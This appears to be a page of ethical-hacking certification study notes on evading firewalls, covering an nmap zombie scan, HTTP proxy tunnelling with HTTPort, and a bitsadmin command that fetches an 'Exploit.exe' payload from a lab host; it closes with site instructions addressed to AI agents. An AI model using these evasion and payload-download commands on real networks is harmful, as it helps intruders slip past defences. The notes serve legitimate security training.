# 2. Evade Firewall using Evasion Techniques

![](/files/omsG50ltzEeaIKNO5DBp)

## <mark style="color:red;">1. Bypass firewall using Nmap</mark>

Add a rule in windows firewall to block all traffic from the attacking machine.

**In Ping sweep, the host will appear as online**

```
nmap -sP 192.168.18.0/24
```

**Zombie scan can bypass the firewall rule**

```
nmap -sI 192.168.18.2 192.168.18.11  \\.11 is the target
```

## <mark style="color:red;">2. Bypass firewall rules using HTTP/ FTP Tunneling</mark>&#x20;

HTTPort allows users to bypass the HTTP proxy, which blocks Internet access to e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC, etc. Here, the Internet software is configured, so that it connects to a local PC as if it is the required remote server; HTTPort then intercepts that connection and runs it via a tunnel through the proxy. HTTPort can work on devices such as proxies or firewalls that allow HTTP traffic. Thus, HTTPort provides access to websites and Internet apps. HTTPort performs tunneling using one of two modes: SSL/CONNECT mode and a remote host. The remote host method is capable of tunneling through any proxy. HTTPort uses a special server software called HTTHost, which is installed outside the proxy-blocked network. It is a web server, and thus when HTTPort is tunneling, it sends a series of HTTP requests to the HTTHost. The proxy responds as if the user is surfing a website and thus allows the user to do so. HTTHost, in turn, performs its half of the tunneling and communicates with the target servers. This mode is much slower, but works in the majority of cases and features strong data encryption that makes proxy logging useless.

{% embed url="<https://www.targeted.org/htthost/>" %}

<figure><img src="/files/q65U3tsH7Vc9ogGANXeW" alt=""><figcaption></figcaption></figure>

## <mark style="color:red;">3. Bypass antivirus using metasploit templates</mark>

Not very good <mark style="background-color:red;">**(to do list)**</mark>

## 4. Bypass firewall using windows BITSAdmin

**The utilty can be used to transfer files in windows command prompt**

BITS (Background Intelligent Transfer Service) is an essential component of Windows XP and later versions of Windows operating systems. BITS is used by system administrators and programmers for downloading files from or uploading files to HTTP webservers and SMB file shares. BITSAdmin is a tool that is used to create download or upload jobs and monitor their progress.

```
bitsadmin /transfer Exploit.exe http://10.10.1.13/share/Exploit.exe c:\Exploit.exe
```

<figure><img src="/files/GWohPm3t6RxiHOhZCVrh" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/pxeloHOrx5tRcSEDMAXG" alt=""><figcaption></figcaption></figure>

{% embed url="<https://www.udemy.com/course/ethical-hacker-practical/?referralCode=289CF01CF51246BCAD6C>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ceh-practical.cavementech.com/module-12.-evading-ids-antivirus-and-honeypots/2.-evade-firewall-using-evasion-techniques.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.